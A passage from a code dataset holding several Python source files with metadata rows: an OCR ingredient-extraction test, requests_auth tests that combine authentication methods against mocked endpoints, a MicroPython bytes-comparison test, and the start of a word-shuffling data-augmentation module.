'1 гuе des Sources F-77176', 'lemple', 'France. Bироблено у Франції', 'Космева С.А.С. Эксклюзивный импорея', 'ок 000 "Байерсдорф"', 'РФ', '105064', 'г. Москва', 'ул. Земляной Вал', 'дом 9. Телефм', \
'мни: 8-800-2000-753. Звонок по России бесплатный. Iмпортер в Укран:', 'кродорф Україна»', 'Україна', 'Київ-04119', 'вул. Дегтярівська 27Т. Годен дод', 'а: см', 'упаковку. Використати до: див. на упаковці. Умови зберiгання: п', \
'р 5-25°С', 'та відносній вологості <80%. Дата виробництва: за 30 міскцв да', 'аинористання.', 'Состав/Склад: Aqua', 'Kаolin', 'Glycerin', 'Alcohol Denat (3% od)', 'Glyceryl Stearate', 'Cetearyl Alcohol', 'Microcrystalline Ce', \
'Butyrospermum Parkii Butter', 'Caprylic/Capric Triglyceride', 'e', 'Magnolia Officinalis Bark Extract', 'Glyceryl Glucoside', 'Potassiom Ca', 'M Phosphate', 'Hydrogenated Palm Glycerides', 'Xanthan Gum', 'Dimethan', \
'Hydrogenated Castor Oil', 'Trisodium EDTA', 'Phenaxyethanol', 'Me', 'paraben', 'Alpha-Isomethyl lonone', 'Citronellol', 'Limonene', 'Par', 'CI 77891', 'CI 42090', 'Арт. 82305', '82305.986.BA.07', 'www.NIVEA.com', '150M', '動台', \
'Beiersdorf AG', 'D-20245 Наmburg', 'reg. tm. of Beiersdorf AG', 'Germany', 'LDPE', 'Beiersdorf', 'Hamburg', '• Wien']
ingredients_1 = self.cream.find_ingredients(self.photo1)
ingredients_2 = self.cream.find_ingredients(self.photo2)
self.assertEqual(ingredients_1, result_1)
self.assertEqual(ingredients_2, result_2)
| 119.858974 | 250 | 0.645203 | 1,149 | 9,349 | 5.222802 | 0.385553 | 0.010498 | 0.011331 | 0.007332 | 0.937011 | 0.900183 | 0.889518 | 0.889518 | 0.889518 | 0.889518 | 0 | 0.03904 | 0.224623 | 9,349 | 77 | 251 | 121.415584 | 0.787695 | 0 | 0 | 0.666667 | 0 | 0 | 0.664258 | 0 | 0 | 0 | 0 | 0 | 0.060606 | 1 | 0.045455 | false | 0 | 0.045455 | 0 | 0.106061 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
291ae31b2e7bf5682f8a71ec24f79da49ef8bb82 | 18,557 | py | Python | tests/test_add_operator.py | StijnCaerts/requests_auth | 5cbdd329555dbabd4d6347ba2104a950eb72ab2c | [
"MIT"
] | 24 | 2018-07-23T09:43:00.000Z | 2022-02-07T18:05:21.000Z | tests/test_add_operator.py | StijnCaerts/requests_auth | 5cbdd329555dbabd4d6347ba2104a950eb72ab2c | [
"MIT"
] | 48 | 2018-09-06T05:29:08.000Z | 2022-02-14T14:28:59.000Z | tests/test_add_operator.py | StijnCaerts/requests_auth | 5cbdd329555dbabd4d6347ba2104a950eb72ab2c | [
"MIT"
] | 11 | 2018-09-29T16:30:39.000Z | 2022-02-23T13:06:41.000Z | import datetime
from responses import RequestsMock
import requests
import requests_auth
from requests_auth.testing import BrowserMock, create_token, token_cache, browser_mock
from tests.auth_helper import get_header
def test_basic_and_api_key_authentication_can_be_combined(responses: RequestsMock):
    """Basic auth combined with a header API key sends both headers."""
    basic = requests_auth.Basic("test_user", "test_pwd")
    api_key = requests_auth.HeaderApiKey("my_provided_api_key")
    combined = basic + api_key
    sent_headers = get_header(responses, combined)
    assert sent_headers.get("Authorization") == "Basic dGVzdF91c2VyOnRlc3RfcHdk"
    assert sent_headers.get("X-Api-Key") == "my_provided_api_key"
def test_header_api_key_and_multiple_authentication_can_be_combined(
    token_cache, responses: RequestsMock
):
    """A single header API key can be added to an already-combined pair."""
    first = requests_auth.HeaderApiKey("my_provided_api_key")
    second = requests_auth.HeaderApiKey(
        "my_provided_api_key2", header_name="X-Api-Key2"
    )
    third = requests_auth.HeaderApiKey(
        "my_provided_api_key3", header_name="X-Api-Key3"
    )
    sent_headers = get_header(responses, first + (second + third))
    expected = {
        "X-Api-Key": "my_provided_api_key",
        "X-Api-Key2": "my_provided_api_key2",
        "X-Api-Key3": "my_provided_api_key3",
    }
    for name, value in expected.items():
        assert sent_headers.get(name) == value
def test_multiple_auth_and_header_api_key_can_be_combined(
    token_cache, responses: RequestsMock
):
    """A combined pair can itself be extended with one more header API key."""
    first = requests_auth.HeaderApiKey("my_provided_api_key")
    second = requests_auth.HeaderApiKey(
        "my_provided_api_key2", header_name="X-Api-Key2"
    )
    third = requests_auth.HeaderApiKey(
        "my_provided_api_key3", header_name="X-Api-Key3"
    )
    sent_headers = get_header(responses, (first + second) + third)
    expected = {
        "X-Api-Key": "my_provided_api_key",
        "X-Api-Key2": "my_provided_api_key2",
        "X-Api-Key3": "my_provided_api_key3",
    }
    for name, value in expected.items():
        assert sent_headers.get(name) == value
def test_multiple_auth_and_multiple_auth_can_be_combined(
    token_cache, responses: RequestsMock
):
    """Combining two already-combined pairs applies all four authentications."""
    key1 = requests_auth.HeaderApiKey("my_provided_api_key")
    key2 = requests_auth.HeaderApiKey(
        "my_provided_api_key2", header_name="X-Api-Key2"
    )
    key3 = requests_auth.HeaderApiKey(
        "my_provided_api_key3", header_name="X-Api-Key3"
    )
    key4 = requests_auth.HeaderApiKey(
        "my_provided_api_key4", header_name="X-Api-Key4"
    )
    combined = (key1 + key2) + (key3 + key4)
    sent_headers = get_header(responses, combined)
    expected = {
        "X-Api-Key": "my_provided_api_key",
        "X-Api-Key2": "my_provided_api_key2",
        "X-Api-Key3": "my_provided_api_key3",
        "X-Api-Key4": "my_provided_api_key4",
    }
    for name, value in expected.items():
        assert sent_headers.get(name) == value
def test_basic_and_multiple_authentication_can_be_combined(
    token_cache, responses: RequestsMock
):
    """Basic auth can be combined with an already-combined API-key pair."""
    basic = requests_auth.Basic("test_user", "test_pwd")
    key2 = requests_auth.HeaderApiKey(
        "my_provided_api_key2", header_name="X-Api-Key2"
    )
    key3 = requests_auth.HeaderApiKey(
        "my_provided_api_key3", header_name="X-Api-Key3"
    )
    sent_headers = get_header(responses, basic + (key2 + key3))
    assert sent_headers.get("Authorization") == "Basic dGVzdF91c2VyOnRlc3RfcHdk"
    assert sent_headers.get("X-Api-Key2") == "my_provided_api_key2"
    assert sent_headers.get("X-Api-Key3") == "my_provided_api_key3"
def test_query_api_key_and_multiple_authentication_can_be_combined(
    token_cache, responses: RequestsMock
):
    """Two query-parameter API keys plus a header API key can be chained with ``+``."""
    api_key_auth = requests_auth.QueryApiKey("my_provided_api_key")
    api_key_auth2 = requests_auth.QueryApiKey(
        "my_provided_api_key2", query_parameter_name="api_key2"
    )
    api_key_auth3 = requests_auth.HeaderApiKey(
        "my_provided_api_key3", header_name="X-Api-Key3"
    )
    # Mock a dummy response
    responses.add(responses.GET, "http://authorized_only")
    # Send a request to this dummy URL with authentication
    response = requests.get(
        "http://authorized_only", auth=api_key_auth + (api_key_auth2 + api_key_auth3)
    )
    # Return headers received on this dummy URL
    # Both query keys must end up in the query string (in combination order),
    # the third key in a request header.
    assert (
        response.request.path_url
        == "/?api_key=my_provided_api_key&api_key2=my_provided_api_key2"
    )
    assert response.request.headers.get("X-Api-Key3") == "my_provided_api_key3"
def test_oauth2_resource_owner_password_and_api_key_authentication_can_be_combined(
    token_cache, responses: RequestsMock
):
    """OAuth2 resource-owner-password auth chained with a header API key."""
    resource_owner_password_auth = requests_auth.OAuth2ResourceOwnerPasswordCredentials(
        "http://provide_access_token", username="test_user", password="test_pwd"
    )
    # Stub the token endpoint; payload mirrors the RFC 6749 example response.
    responses.add(
        responses.POST,
        "http://provide_access_token",
        json={
            "access_token": "2YotnFZFEjr1zCsicMWpAA",
            "token_type": "example",
            "expires_in": 3600,
            "refresh_token": "tGzv3JOkF0XG5Qx2TlKWIA",
            "example_parameter": "example_value",
        },
    )
    api_key_auth = requests_auth.HeaderApiKey("my_provided_api_key")
    header = get_header(responses, resource_owner_password_auth + api_key_auth)
    assert header.get("Authorization") == "Bearer 2YotnFZFEjr1zCsicMWpAA"
    assert header.get("X-Api-Key") == "my_provided_api_key"
def test_oauth2_resource_owner_password_and_multiple_authentication_can_be_combined(
    token_cache, responses: RequestsMock
):
    """OAuth2 resource-owner-password auth chained with a combined API-key pair."""
    resource_owner_password_auth = requests_auth.OAuth2ResourceOwnerPasswordCredentials(
        "http://provide_access_token", username="test_user", password="test_pwd"
    )
    # Stub the token endpoint; payload mirrors the RFC 6749 example response.
    responses.add(
        responses.POST,
        "http://provide_access_token",
        json={
            "access_token": "2YotnFZFEjr1zCsicMWpAA",
            "token_type": "example",
            "expires_in": 3600,
            "refresh_token": "tGzv3JOkF0XG5Qx2TlKWIA",
            "example_parameter": "example_value",
        },
    )
    api_key_auth = requests_auth.HeaderApiKey("my_provided_api_key")
    api_key_auth2 = requests_auth.HeaderApiKey(
        "my_provided_api_key2", header_name="X-Api-Key2"
    )
    header = get_header(
        responses, resource_owner_password_auth + (api_key_auth + api_key_auth2)
    )
    assert header.get("Authorization") == "Bearer 2YotnFZFEjr1zCsicMWpAA"
    assert header.get("X-Api-Key") == "my_provided_api_key"
    assert header.get("X-Api-Key2") == "my_provided_api_key2"
def test_oauth2_client_credential_and_api_key_authentication_can_be_combined(
    token_cache, responses: RequestsMock
):
    """OAuth2 client-credentials auth chained with a header API key.

    Fix: the local was previously named ``resource_owner_password_auth`` —
    copy-pasted from the resource-owner tests — although this is a
    client-credentials flow; renamed for accuracy (behavior unchanged).
    """
    client_credentials_auth = requests_auth.OAuth2ClientCredentials(
        "http://provide_access_token", client_id="test_user", client_secret="test_pwd"
    )
    # Stub the token endpoint; payload mirrors the RFC 6749 example response.
    responses.add(
        responses.POST,
        "http://provide_access_token",
        json={
            "access_token": "2YotnFZFEjr1zCsicMWpAA",
            "token_type": "example",
            "expires_in": 3600,
            "refresh_token": "tGzv3JOkF0XG5Qx2TlKWIA",
            "example_parameter": "example_value",
        },
    )
    api_key_auth = requests_auth.HeaderApiKey("my_provided_api_key")
    header = get_header(responses, client_credentials_auth + api_key_auth)
    assert header.get("Authorization") == "Bearer 2YotnFZFEjr1zCsicMWpAA"
    assert header.get("X-Api-Key") == "my_provided_api_key"
def test_oauth2_client_credential_and_multiple_authentication_can_be_combined(
    token_cache, responses: RequestsMock
):
    """OAuth2 client-credentials auth chained with a combined API-key pair.

    Fix: the local was previously named ``resource_owner_password_auth`` —
    copy-pasted from the resource-owner tests — although this is a
    client-credentials flow; renamed for accuracy (behavior unchanged).
    """
    client_credentials_auth = requests_auth.OAuth2ClientCredentials(
        "http://provide_access_token", client_id="test_user", client_secret="test_pwd"
    )
    # Stub the token endpoint; payload mirrors the RFC 6749 example response.
    responses.add(
        responses.POST,
        "http://provide_access_token",
        json={
            "access_token": "2YotnFZFEjr1zCsicMWpAA",
            "token_type": "example",
            "expires_in": 3600,
            "refresh_token": "tGzv3JOkF0XG5Qx2TlKWIA",
            "example_parameter": "example_value",
        },
    )
    api_key_auth = requests_auth.HeaderApiKey("my_provided_api_key")
    api_key_auth2 = requests_auth.HeaderApiKey(
        "my_provided_api_key2", header_name="X-Api-Key2"
    )
    header = get_header(
        responses, client_credentials_auth + (api_key_auth + api_key_auth2)
    )
    assert header.get("Authorization") == "Bearer 2YotnFZFEjr1zCsicMWpAA"
    assert header.get("X-Api-Key") == "my_provided_api_key"
    assert header.get("X-Api-Key2") == "my_provided_api_key2"
def test_oauth2_authorization_code_and_api_key_authentication_can_be_combined(
    token_cache, responses: RequestsMock, browser_mock: BrowserMock
):
    """OAuth2 authorization-code auth chained with a header API key."""
    authorization_code_auth = requests_auth.OAuth2AuthorizationCode(
        "http://provide_code", "http://provide_access_token"
    )
    # Fake the browser round-trip. The long state value is deterministic
    # (presumably derived by requests_auth from the request parameters) and
    # must therefore match in the opened URL, the reply and the success text.
    tab = browser_mock.add_response(
        opened_url="http://provide_code?response_type=code&state=163f0455b3e9cad3ca04254e5a0169553100d3aa0756c7964d897da316a695ffed5b4f46ef305094fd0a88cfe4b55ff257652015e4aa8f87b97513dba440f8de&redirect_uri=http%3A%2F%2Flocalhost%3A5000%2F",
        reply_url="http://localhost:5000#code=SplxlOBeZQQYbYS6WxSbIA&state=163f0455b3e9cad3ca04254e5a0169553100d3aa0756c7964d897da316a695ffed5b4f46ef305094fd0a88cfe4b55ff257652015e4aa8f87b97513dba440f8de",
    )
    # Stub the token endpoint; payload mirrors the RFC 6749 example response.
    responses.add(
        responses.POST,
        "http://provide_access_token",
        json={
            "access_token": "2YotnFZFEjr1zCsicMWpAA",
            "token_type": "example",
            "expires_in": 3600,
            "refresh_token": "tGzv3JOkF0XG5Qx2TlKWIA",
            "example_parameter": "example_value",
        },
    )
    api_key_auth = requests_auth.HeaderApiKey("my_provided_api_key")
    header = get_header(responses, authorization_code_auth + api_key_auth)
    assert header.get("Authorization") == "Bearer 2YotnFZFEjr1zCsicMWpAA"
    assert header.get("X-Api-Key") == "my_provided_api_key"
    tab.assert_success(
        "You are now authenticated on 163f0455b3e9cad3ca04254e5a0169553100d3aa0756c7964d897da316a695ffed5b4f46ef305094fd0a88cfe4b55ff257652015e4aa8f87b97513dba440f8de. You may close this tab."
    )
def test_oauth2_authorization_code_and_multiple_authentication_can_be_combined(
    token_cache, responses: RequestsMock, browser_mock: BrowserMock
):
    """OAuth2 authorization-code auth chained with a combined API-key pair."""
    authorization_code_auth = requests_auth.OAuth2AuthorizationCode(
        "http://provide_code", "http://provide_access_token"
    )
    # Fake the browser round-trip; the deterministic state value must match
    # in the opened URL, the reply and the success text.
    tab = browser_mock.add_response(
        opened_url="http://provide_code?response_type=code&state=163f0455b3e9cad3ca04254e5a0169553100d3aa0756c7964d897da316a695ffed5b4f46ef305094fd0a88cfe4b55ff257652015e4aa8f87b97513dba440f8de&redirect_uri=http%3A%2F%2Flocalhost%3A5000%2F",
        reply_url="http://localhost:5000#code=SplxlOBeZQQYbYS6WxSbIA&state=163f0455b3e9cad3ca04254e5a0169553100d3aa0756c7964d897da316a695ffed5b4f46ef305094fd0a88cfe4b55ff257652015e4aa8f87b97513dba440f8de",
    )
    # Stub the token endpoint; payload mirrors the RFC 6749 example response.
    responses.add(
        responses.POST,
        "http://provide_access_token",
        json={
            "access_token": "2YotnFZFEjr1zCsicMWpAA",
            "token_type": "example",
            "expires_in": 3600,
            "refresh_token": "tGzv3JOkF0XG5Qx2TlKWIA",
            "example_parameter": "example_value",
        },
    )
    api_key_auth = requests_auth.HeaderApiKey("my_provided_api_key")
    api_key_auth2 = requests_auth.HeaderApiKey(
        "my_provided_api_key2", header_name="X-Api-Key2"
    )
    header = get_header(
        responses, authorization_code_auth + (api_key_auth + api_key_auth2)
    )
    assert header.get("Authorization") == "Bearer 2YotnFZFEjr1zCsicMWpAA"
    assert header.get("X-Api-Key") == "my_provided_api_key"
    assert header.get("X-Api-Key2") == "my_provided_api_key2"
    tab.assert_success(
        "You are now authenticated on 163f0455b3e9cad3ca04254e5a0169553100d3aa0756c7964d897da316a695ffed5b4f46ef305094fd0a88cfe4b55ff257652015e4aa8f87b97513dba440f8de. You may close this tab."
    )
def test_oauth2_pkce_and_api_key_authentication_can_be_combined(
    token_cache, responses: RequestsMock, browser_mock: BrowserMock, monkeypatch
):
    """OAuth2 authorization-code-with-PKCE auth chained with a header API key."""
    # Pin os.urandom so the PKCE code verifier — and hence the code_challenge
    # in the expected URL below — is deterministic.
    monkeypatch.setattr(requests_auth.authentication.os, "urandom", lambda x: b"1" * 63)
    pkce_auth = requests_auth.OAuth2AuthorizationCodePKCE(
        "http://provide_code", "http://provide_access_token"
    )
    # Fake the browser round-trip; state must match in all three places.
    tab = browser_mock.add_response(
        opened_url="http://provide_code?response_type=code&state=163f0455b3e9cad3ca04254e5a0169553100d3aa0756c7964d897da316a695ffed5b4f46ef305094fd0a88cfe4b55ff257652015e4aa8f87b97513dba440f8de&redirect_uri=http%3A%2F%2Flocalhost%3A5000%2F&code_challenge=5C_ph_KZ3DstYUc965SiqmKAA-ShvKF4Ut7daKd3fjc&code_challenge_method=S256",
        reply_url="http://localhost:5000#code=SplxlOBeZQQYbYS6WxSbIA&state=163f0455b3e9cad3ca04254e5a0169553100d3aa0756c7964d897da316a695ffed5b4f46ef305094fd0a88cfe4b55ff257652015e4aa8f87b97513dba440f8de",
    )
    # Stub the token endpoint; payload mirrors the RFC 6749 example response.
    responses.add(
        responses.POST,
        "http://provide_access_token",
        json={
            "access_token": "2YotnFZFEjr1zCsicMWpAA",
            "token_type": "example",
            "expires_in": 3600,
            "refresh_token": "tGzv3JOkF0XG5Qx2TlKWIA",
            "example_parameter": "example_value",
        },
    )
    api_key_auth = requests_auth.HeaderApiKey("my_provided_api_key")
    header = get_header(responses, pkce_auth + api_key_auth)
    assert header.get("Authorization") == "Bearer 2YotnFZFEjr1zCsicMWpAA"
    assert header.get("X-Api-Key") == "my_provided_api_key"
    tab.assert_success(
        "You are now authenticated on 163f0455b3e9cad3ca04254e5a0169553100d3aa0756c7964d897da316a695ffed5b4f46ef305094fd0a88cfe4b55ff257652015e4aa8f87b97513dba440f8de. You may close this tab."
    )
def test_oauth2_pkce_and_multiple_authentication_can_be_combined(
    token_cache, responses: RequestsMock, browser_mock: BrowserMock, monkeypatch
):
    """OAuth2 PKCE auth chained with a combined API-key pair."""
    # Pin os.urandom so the PKCE code verifier — and hence the code_challenge
    # in the expected URL below — is deterministic.
    monkeypatch.setattr(requests_auth.authentication.os, "urandom", lambda x: b"1" * 63)
    pkce_auth = requests_auth.OAuth2AuthorizationCodePKCE(
        "http://provide_code", "http://provide_access_token"
    )
    # Fake the browser round-trip; state must match in all three places.
    tab = browser_mock.add_response(
        opened_url="http://provide_code?response_type=code&state=163f0455b3e9cad3ca04254e5a0169553100d3aa0756c7964d897da316a695ffed5b4f46ef305094fd0a88cfe4b55ff257652015e4aa8f87b97513dba440f8de&redirect_uri=http%3A%2F%2Flocalhost%3A5000%2F&code_challenge=5C_ph_KZ3DstYUc965SiqmKAA-ShvKF4Ut7daKd3fjc&code_challenge_method=S256",
        reply_url="http://localhost:5000#code=SplxlOBeZQQYbYS6WxSbIA&state=163f0455b3e9cad3ca04254e5a0169553100d3aa0756c7964d897da316a695ffed5b4f46ef305094fd0a88cfe4b55ff257652015e4aa8f87b97513dba440f8de",
    )
    # Stub the token endpoint; payload mirrors the RFC 6749 example response.
    responses.add(
        responses.POST,
        "http://provide_access_token",
        json={
            "access_token": "2YotnFZFEjr1zCsicMWpAA",
            "token_type": "example",
            "expires_in": 3600,
            "refresh_token": "tGzv3JOkF0XG5Qx2TlKWIA",
            "example_parameter": "example_value",
        },
    )
    api_key_auth = requests_auth.HeaderApiKey("my_provided_api_key")
    api_key_auth2 = requests_auth.HeaderApiKey(
        "my_provided_api_key2", header_name="X-Api-Key2"
    )
    header = get_header(responses, pkce_auth + (api_key_auth + api_key_auth2))
    assert header.get("Authorization") == "Bearer 2YotnFZFEjr1zCsicMWpAA"
    assert header.get("X-Api-Key") == "my_provided_api_key"
    assert header.get("X-Api-Key2") == "my_provided_api_key2"
    tab.assert_success(
        "You are now authenticated on 163f0455b3e9cad3ca04254e5a0169553100d3aa0756c7964d897da316a695ffed5b4f46ef305094fd0a88cfe4b55ff257652015e4aa8f87b97513dba440f8de. You may close this tab."
    )
def test_oauth2_implicit_and_api_key_authentication_can_be_combined(
    token_cache, responses: RequestsMock, browser_mock: BrowserMock
):
    """OAuth2 implicit-flow auth chained with a header API key."""
    implicit_auth = requests_auth.OAuth2Implicit("http://provide_token")
    # The token carries an expiry one hour in the future so it is still valid.
    expiry_in_1_hour = datetime.datetime.utcnow() + datetime.timedelta(hours=1)
    token = create_token(expiry_in_1_hour)
    # Fake the browser round-trip returning the token directly (implicit flow).
    tab = browser_mock.add_response(
        opened_url="http://provide_token?response_type=token&state=42a85b271b7a652ca3cc4c398cfd3f01b9ad36bf9c945ba823b023e8f8b95c4638576a0e3dcc96838b838bec33ec6c0ee2609d62ed82480b3b8114ca494c0521&redirect_uri=http%3A%2F%2Flocalhost%3A5000%2F",
        reply_url="http://localhost:5000",
        data=f"access_token={token}&state=42a85b271b7a652ca3cc4c398cfd3f01b9ad36bf9c945ba823b023e8f8b95c4638576a0e3dcc96838b838bec33ec6c0ee2609d62ed82480b3b8114ca494c0521",
    )
    api_key_auth = requests_auth.HeaderApiKey("my_provided_api_key")
    header = get_header(responses, implicit_auth + api_key_auth)
    assert header.get("Authorization") == f"Bearer {token}"
    assert header.get("X-Api-Key") == "my_provided_api_key"
    tab.assert_success(
        "You are now authenticated on 42a85b271b7a652ca3cc4c398cfd3f01b9ad36bf9c945ba823b023e8f8b95c4638576a0e3dcc96838b838bec33ec6c0ee2609d62ed82480b3b8114ca494c0521. You may close this tab."
    )
def test_oauth2_implicit_and_multiple_authentication_can_be_combined(
    token_cache, responses: RequestsMock, browser_mock: BrowserMock
):
    """OAuth2 implicit-flow auth chained with a combined API-key pair."""
    implicit_auth = requests_auth.OAuth2Implicit("http://provide_token")
    # The token carries an expiry one hour in the future so it is still valid.
    expiry_in_1_hour = datetime.datetime.utcnow() + datetime.timedelta(hours=1)
    token = create_token(expiry_in_1_hour)
    # Fake the browser round-trip returning the token directly (implicit flow).
    tab = browser_mock.add_response(
        opened_url="http://provide_token?response_type=token&state=42a85b271b7a652ca3cc4c398cfd3f01b9ad36bf9c945ba823b023e8f8b95c4638576a0e3dcc96838b838bec33ec6c0ee2609d62ed82480b3b8114ca494c0521&redirect_uri=http%3A%2F%2Flocalhost%3A5000%2F",
        reply_url="http://localhost:5000",
        data=f"access_token={token}&state=42a85b271b7a652ca3cc4c398cfd3f01b9ad36bf9c945ba823b023e8f8b95c4638576a0e3dcc96838b838bec33ec6c0ee2609d62ed82480b3b8114ca494c0521",
    )
    api_key_auth = requests_auth.HeaderApiKey("my_provided_api_key")
    api_key_auth2 = requests_auth.HeaderApiKey(
        "my_provided_api_key2", header_name="X-Api-Key2"
    )
    header = get_header(responses, implicit_auth + (api_key_auth + api_key_auth2))
    assert header.get("Authorization") == f"Bearer {token}"
    assert header.get("X-Api-Key") == "my_provided_api_key"
    assert header.get("X-Api-Key2") == "my_provided_api_key2"
    tab.assert_success(
        "You are now authenticated on 42a85b271b7a652ca3cc4c398cfd3f01b9ad36bf9c945ba823b023e8f8b95c4638576a0e3dcc96838b838bec33ec6c0ee2609d62ed82480b3b8114ca494c0521. You may close this tab."
    )
| 47.339286 | 327 | 0.747265 | 1,999 | 18,557 | 6.544772 | 0.070535 | 0.053199 | 0.061607 | 0.036689 | 0.957579 | 0.956126 | 0.943897 | 0.934877 | 0.933043 | 0.924711 | 0 | 0.115016 | 0.156652 | 18,557 | 391 | 328 | 47.460358 | 0.720958 | 0.006251 | 0 | 0.705382 | 0 | 0.016997 | 0.408309 | 0.093236 | 0 | 0 | 0 | 0 | 0.135977 | 1 | 0.045326 | false | 0.033994 | 0.016997 | 0 | 0.062323 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
292267ba75dfb5bbb4d81de0fbac17ce04e8a8e7 | 920 | py | Python | tests/basics/bytes_compare.py | learnforpractice/micropython-cpp | 004bc8382f74899e7b876cc29bfa6a9cc976ba10 | [
"MIT"
] | 13,648 | 2015-01-01T01:34:51.000Z | 2022-03-31T16:19:53.000Z | tests/basics/bytes_compare.py | learnforpractice/micropython-cpp | 004bc8382f74899e7b876cc29bfa6a9cc976ba10 | [
"MIT"
] | 7,092 | 2015-01-01T07:59:11.000Z | 2022-03-31T23:52:18.000Z | tests/basics/bytes_compare.py | learnforpractice/micropython-cpp | 004bc8382f74899e7b876cc29bfa6a9cc976ba10 | [
"MIT"
] | 4,942 | 2015-01-02T11:48:50.000Z | 2022-03-31T19:57:10.000Z | print(b"" == b"")
# MicroPython regression test: exercise every bytes comparison operator
# (==, !=, <, <=, >, >=) on empty values, single bytes, prefix pairs
# (b"1" vs b"10") and ASCII ordering (b"1" vs b"1/"); the printed True/False
# sequence is compared against CPython's output, so the literal operator
# forms below are deliberate and must not be refactored.
print(b"" > b"")
print(b"" < b"")
print(b"" == b"1")
print(b"1" == b"")
print("==")
print(b"" > b"1")
print(b"1" > b"")
print(b"" < b"1")
print(b"1" < b"")
print(b"" >= b"1")
print(b"1" >= b"")
print(b"" <= b"1")
print(b"1" <= b"")
print(b"1" == b"1")
print(b"1" != b"1")
print(b"1" == b"2")
print(b"1" == b"10")
print(b"1" > b"1")
print(b"1" > b"2")
print(b"2" > b"1")
print(b"10" > b"1")
print(b"1/" > b"1")
print(b"1" > b"10")
print(b"1" > b"1/")
print(b"1" < b"1")
print(b"2" < b"1")
print(b"1" < b"2")
print(b"1" < b"10")
print(b"1" < b"1/")
print(b"10" < b"1")
print(b"1/" < b"1")
print(b"1" >= b"1")
print(b"1" >= b"2")
print(b"2" >= b"1")
print(b"10" >= b"1")
print(b"1/" >= b"1")
print(b"1" >= b"10")
print(b"1" >= b"1/")
print(b"1" <= b"1")
print(b"2" <= b"1")
print(b"1" <= b"2")
print(b"1" <= b"10")
print(b"1" <= b"1/")
print(b"10" <= b"1")
print(b"1/" <= b"1")
print(b'o' == b'\n')
| 17.037037 | 20 | 0.447826 | 215 | 920 | 1.916279 | 0.032558 | 0.271845 | 0.492718 | 0.563107 | 0.992718 | 0.992718 | 0.992718 | 0.992718 | 0.992718 | 0.944175 | 0 | 0.107097 | 0.157609 | 920 | 53 | 21 | 17.358491 | 0.424516 | 0 | 0 | 0 | 0 | 0 | 0.104348 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 13 |
2932c1e42a54fd93c3bfbd265bcdd24eadff8c21 | 61,225 | py | Python | code/transformers/src/transformers/data/data_augmentation.py | lingo-mit/transformers | 478fb18a9f9680321f0d37dc999ea444e9287cc0 | [
"Apache-2.0"
] | null | null | null | code/transformers/src/transformers/data/data_augmentation.py | lingo-mit/transformers | 478fb18a9f9680321f0d37dc999ea444e9287cc0 | [
"Apache-2.0"
] | null | null | null | code/transformers/src/transformers/data/data_augmentation.py | lingo-mit/transformers | 478fb18a9f9680321f0d37dc999ea444e9287cc0 | [
"Apache-2.0"
] | null | null | null | import random
import re
import pandas as pd
from scipy.stats import kendalltau
from random import randint
import string
from tqdm import tqdm
from augmentation_utils import *
import nltk
# nltk.download('averaged_perceptron_tagger')
# nltk.download('punkt')
import spacy
nlp = spacy.load("en_core_web_md")
random.seed(42)
# ---------- SHUFFLE WORDS ----------
def shuffle_first_half(tokenized_text, tokenizer, count):
    """Shuffle the word order within the first half of the passage."""
    section_len = len(tokenized_text) // 2
    return shuffle_section(tokenized_text, tokenizer, section_len, count)
def shuffle_first_third(tokenized_text, tokenizer, count):
    """Shuffle the word order within the first third of the passage."""
    section_len = len(tokenized_text) // 3
    return shuffle_section(tokenized_text, tokenizer, section_len, count)
def shuffle_first_two_thirds(tokenized_text, tokenizer, count):
    """Shuffle the word order within the first two thirds of the passage."""
    section_len = 2 * len(tokenized_text) // 3
    return shuffle_section(tokenized_text, tokenizer, section_len, count)
def shuffle_section(tokenized_text, tokenizer, section_length, count):
    """Shuffle the words of the first ``section_length`` token ids of a passage.

    The ids are split into a head (to be augmented) and an untouched tail,
    decoded back to text, the head's words are shuffled (seeded with
    ``42 + count`` so each augmentation pass is reproducible), and the result
    is re-tokenized with an ``<|endofaugmentedtext|>`` separator between head
    and tail.

    Returns whatever ``check_tokenization`` yields for the re-tokenized ids —
    judging by callers (see shuffle_remove_all_but_pos), a falsy value signals
    a rejected augmentation.
    """
    random.seed(42 + count)
    first_part_tokens, second_part_tokens = divide_into_sections(tokenized_text, tokenizer, section_length)
    first_part_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(first_part_tokens))
    second_part_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(second_part_tokens))
    split_first_part_text = convert_to_tokens(first_part_text, tokenizer)
    # Fix: removed a dead `convert_to_tokens(second_part_text, tokenizer)`
    # call whose result was never read (the join below uses the raw
    # second_part_text); presumed side-effect free — confirm in
    # augmentation_utils.
    random.shuffle(split_first_part_text)
    return check_tokenization(
        tokenized_text,
        tokenizer.convert_tokens_to_ids(
            tokenizer.tokenize("".join(split_first_part_text + ["<|endofaugmentedtext|>", second_part_text]))
        ),
        tokenizer,
        shuffle_section,
    )
# ---------- SHUFFLE WORDS & REMOVE POS ----------
def shuffle_remove_all_but_nouns_first_half(tokenized_text, tokenizer, count):
    """Shuffle the first half, then keep only noun-like words there."""
    section_len = len(tokenized_text) // 2
    return shuffle_remove_all_but_pos(tokenized_text, tokenizer, section_len, ("NOUN", "PRON", "PROPN"), count)
def shuffle_remove_all_but_nouns_first_third(tokenized_text, tokenizer, count):
    """Shuffle the first third, then keep only noun-like words there."""
    section_len = len(tokenized_text) // 3
    return shuffle_remove_all_but_pos(tokenized_text, tokenizer, section_len, ("NOUN", "PRON", "PROPN"), count)
